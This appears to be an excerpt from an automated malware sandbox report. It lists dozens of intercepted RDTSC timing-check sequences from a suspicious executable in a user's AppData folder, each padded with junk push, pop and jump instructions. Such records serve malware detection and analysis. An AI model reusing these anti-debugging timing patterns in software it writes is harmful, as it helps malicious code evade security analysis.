Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C5C46 second address: 9C5C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C5C4C second address: 9C5C5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C62A8 second address: 9C62AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C7012 second address: 9C7023 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CBE78 second address: 9CBEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5828CEC30Fh 0x0000000a jmp 00007F5828CEC315h 0x0000000f pushad 0x00000010 jo 00007F5828CEC306h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5828CEC313h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CBEC4 second address: 9CBED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5828704A66h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CBED2 second address: 9CBED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CF256 second address: 9CF25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CF6B8 second address: 9CF6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CF6BD second address: 9CF6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828704A75h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F5828704A6Ch 0x00000014 pushad 0x00000015 popad 0x00000016 jl 00007F5828704A66h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CF6F2 second address: 9CF6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CFA99 second address: 9CFAA4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CFAA4 second address: 9CFAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CFAA9 second address: 9CFAAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CFAAE second address: 9CFADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push ecx 0x00000008 jc 00007F5828CEC306h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007F5828CEC320h 0x00000019 jmp 00007F5828CEC30Ch 0x0000001e je 00007F5828CEC30Eh 0x00000024 push esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7CA2 second address: 9D7CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828704A79h 0x0000000a pop ebx 0x0000000b jbe 00007F5828704A89h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F5828704A66h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7CCF second address: 9D7CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7E3D second address: 9D7E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5828704A66h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f jne 00007F5828704A66h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7F96 second address: 9D7F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7F9A second address: 9D7F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7F9E second address: 9D7FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7FA6 second address: 9D7FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5828704A66h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5828704A78h 0x00000015 jng 00007F5828704A66h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7FD4 second address: 9D7FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D8AF9 second address: 9D8AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D8AFF second address: 9D8B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D8B04 second address: 9D8B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D8B0E second address: 9D8B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D91B1 second address: 9D91E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5828704A79h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5828704A77h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D91E7 second address: 9D91EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7185 second address: 9D718A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9DED4C second address: 9DED50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9DED50 second address: 9DED54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9EBCF1 second address: 9EBCFB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828CEC306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9EBCFB second address: 9EBD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F5828704A66h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9EB99B second address: 9EB9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9EB9A1 second address: 9EB9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828704A77h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9EF510 second address: 9EF52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Fh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jns 00007F5828CEC306h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A011C5 second address: A011C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A011C9 second address: A011ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC315h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A09634 second address: A0963F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A0963F second address: A0966A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F5828CEC306h 0x0000000c jne 00007F5828CEC306h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F5828CEC311h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A07EE3 second address: A07EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A07EE9 second address: A07EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A0802E second address: A08036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A08036 second address: A08047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F5828CEC30Ch 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A0DB51 second address: A0DB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828704A73h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A176C4 second address: A176D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F5828CEC306h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A176D2 second address: A176EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A176EF second address: A176F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A1C156 second address: A1C166 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A1C166 second address: A1C186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC318h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A1C186 second address: A1C18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A20821 second address: A2083D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A22122 second address: A2213A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F5828704A66h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push esi 0x00000010 jl 00007F5828704A66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A32A44 second address: A32A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5828CEC306h 0x00000009 jnp 00007F5828CEC306h 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4ACC8 second address: A4ACD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4AF95 second address: A4AF9F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5828CEC306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4AF9F second address: A4AFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4AFA8 second address: A4AFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4AFB4 second address: A4AFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4AFBE second address: A4AFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5828CEC316h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4B349 second address: A4B35C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4B776 second address: A4B77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4B8D9 second address: A4B8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4D26C second address: A4D272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4D272 second address: A4D284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4FD68 second address: A4FD6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4FE14 second address: A4FE1E instructions: 0x00000000 rdtsc 0x00000002 je 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A4FE1E second address: A4FE23 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A50134 second address: A50138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A50138 second address: A5013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A5013E second address: A50144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A50144 second address: A50148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A50148 second address: A5014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A531C6 second address: A531CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A52D9B second address: A52DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A54CDC second address: A54CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC314h 0x00000009 jc 00007F5828CEC306h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F30E64 second address: 4F30E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20DB8 second address: 4F20DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20DBC second address: 4F20DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20DC2 second address: 4F20DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F0013D second address: 4F00155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A74h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20AA7 second address: 4F20AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC30Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20AB7 second address: 4F20B1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5828704A76h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F5828704A71h 0x00000018 jmp 00007F5828704A70h 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5828704A77h 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F205DA second address: 4F205E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F205E0 second address: 4F2063B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007F5828704A74h 0x00000012 mov esi, 5EA6AF11h 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 mov edi, esi 0x0000001b pop eax 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F5828704A74h 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F5828704A6Dh 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F2063B second address: 4F20660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, di 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20660 second address: 4F20665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20665 second address: 4F2066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F2066B second address: 4F2066F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F2066F second address: 4F20690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20690 second address: 4F20696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F3002A second address: 4F30076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5828CEC311h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F5828CEC313h 0x00000018 mov eax, 34A2D30Fh 0x0000001d popad 0x0000001e rdtsc
